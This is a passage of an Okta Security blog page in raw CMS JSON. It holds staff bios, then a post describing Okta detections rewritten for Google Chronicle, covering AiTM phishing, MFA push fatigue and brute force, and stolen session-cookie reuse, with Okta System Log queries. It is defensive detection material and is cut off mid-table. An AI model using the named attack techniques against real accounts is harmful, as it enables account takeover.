Rob Gil is a Sr. Director, Federal Architecture at Okta and is responsible for leading the Public Sector technology initiatives for FedRAMP, DoD Impact Levels, and StateRAMP. Prior to Okta, Rob worked on the JEDI project for the DoD Cloud Computing Program Office as well as leading the Cloud SecOps team at Elastic. Rob’s work at Elastic helped set the foundations for the Elastic SIEM as an initial core contributor to the Elastic Common Schema and first version of the Elastic SIEM. Before Elastic, Rob led operations and engineering teams at Salesforce and a variety of financial institutions. When not working, Rob enjoys the quiet life on his homestead and dabbling with tech.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg"},"name":"Rob Gil","jobTitle":"Sr. Director, Federal Architecture","slug":"/hackers/rob-gil","node_locale":"en"},{"id":"110196ee-f45a-5ada-b02c-40d591fa732c","bio":{"bio":"Naveed is a Senior Solutions Architect at Okta, focusing on the DoD and Federal customer base. He has worked in cybersecurity since leaving the US Navy in the late 1990s. Before coming to Okta, Naveed was a consultant for several DoD customers, and he continues to offer advice via active participation in the DoD community. He grew up in Stafford, Virginia, and upon returning from active duty, took up residence there once more. In his free time, he enjoys beer brewing, gaming, and the occasional date night with his wife.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg"},"name":"Naveed Mirza","jobTitle":"Senior Solutions Architect","slug":"/hackers/naveed-mirza","node_locale":"en"},{"id":"76ecc069-7d69-5aa8-a81d-cf72595f683e","bio":{"bio":"Brandon Iske is a Principal Solutions Architect focused on enabling Federal Government and strategic accounts at Okta. He is passionate about strengthening our nation’s cybersecurity and user experience through Identity-focused IT modernization and cyber best practices. Before joining Okta, Brandon worked for over a decade in government public service to deliver and secure joint Department of Defense enterprise capabilities in endpoint security, mobile management, identity and access management, and Zero Trust architecture at the Defense Information Systems Agency. He earned a Bachelor’s Degree in Computer Science from the University of Nebraska at Omaha. He is also a National Science Foundation CyberCorps Scholarship for Service Alumnus and an Okta Certified Professional.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg"},"name":"Brandon Iske","jobTitle":"Principal Solutions Architect","slug":"/hackers/brandon-iske","node_locale":"en"}]},{"slug":"/articles/2023/08/telling-more-okta-detection-stories-google-chronicle","id":"057558a0-7d4f-55d4-ad76-5f33154b65c7","title":"Telling More Okta Detection Stories with Google Chronicle ","date":"2023-08-02T17:42:12+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Robust protection comes from layers, and many of you are already familiar with the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://en.wikipedia.org/wiki/Swiss_cheese_model\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Swiss Cheese Model\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Simply stated, even when you're confident in your primary controls, that confidence only grows with each additional layer added. Because who wants to have a defense that’s built around a single slice of sad cheese, wrapped in a pitiful film of plastic? No thanks, we’ll take that sturdy block of Swiss each and every time.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Of course, given how thin most security teams are spread, robust layering is often easier said than done. Not every security team has the luxury of dedicated Detection Engineers to craft, research and develop custom logic to catch threat actor activity, and not every security team has the time and skill to synthesize and recreate our logic in other SIEM platforms. With this in mind, Okta Security \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recently published a number of our bespoke detections\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“But,” quoth the game show hosts, “ that’s not all!” Today we’re excited to share that Chronicle and Okta have been collaborating to help these detections reach an even wider audience. And this time around, the Chronicle team threw a few extra slices of cheese on top!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Not only did they rewrite these detections for their environment, they also did their own research and wrote additional detections. You can read more about each of them over at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.googlecloudcommunity.com/gc/Community-Blog/Better-Together-Detecting-Suspicious-Okta-Events-with-Google/ba-p/721331\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle’s blog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". We’ve described them below too.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To channel the words of Oprah, “You get a new detection, and you get a new detection, and you get a new detection!”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Phishing Detection with FastPass Origin Check\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1566/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1566\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_phishing_detection_with_fastpass_origin_check.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_phishing_detection_with_fastpass_origin_check\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provides a platform detection for when a user enrolled in FastPass fails to authenticate via a real-time AiTM phishing proxy.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting Real-Time Phishing Attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND result eq \\\"FAILURE\\\" AND outcome.reason eq \\\"FastPass declined phishing attempt\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Successful MFA After Multiple Failures\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Access\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_mfa_brute_force_attack.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_mfa_brute_force_attack\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detects a successful login after multiple failed MFA pushes\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/pushfatigueworkflows\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using Workflows to Respond to Anomalous Push Requests\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Repeated MFA Rejections by User\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_rejected_multiple_push_notifications.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_rejected_multiple_push_notifications\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects when an Okta user rejects more than 2 Push notifications in a 10 minute window.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/pushfatigueworkflows\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using Workflows to Respond to Anomalous Push Requests\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND outcome.result=\\\"FAILURE\\\" and outcome.reason=\\\"INVALID_CREDENTIALS\\\" and debugContext.debugData.factor eq \\\"OKTA_VERIFY_PUSH\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Classic Engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.mfa.okta_verify.deny_push\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Use of an Okta Session Cookie\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1539/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1539\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Steal Web Session Cookie\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_suspicious_use_of_a_session_cookie.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_suspicious_use_of_a_session_cookie\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detects when an adversary attempts to reuse a stolen web session cookie in a different device that has a different OS, IP, Browser or User Agent.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Defending against Session Hijacking\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Failed Number Challenge\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1621/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1621\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-Factor Authentication Request Generation\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_failed_number_challenge_during_push_notification.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_failed_number_challenge_during_push_notification\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detects when an Okta user failed a number challenge during push notification.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Number-Challenge-for-Okta-Verify\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Number Challenge for Okta Verify\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mismatch Between Source and Response for Verify Push Request\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1621\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1621\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-Factor Authentication Request Generation\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 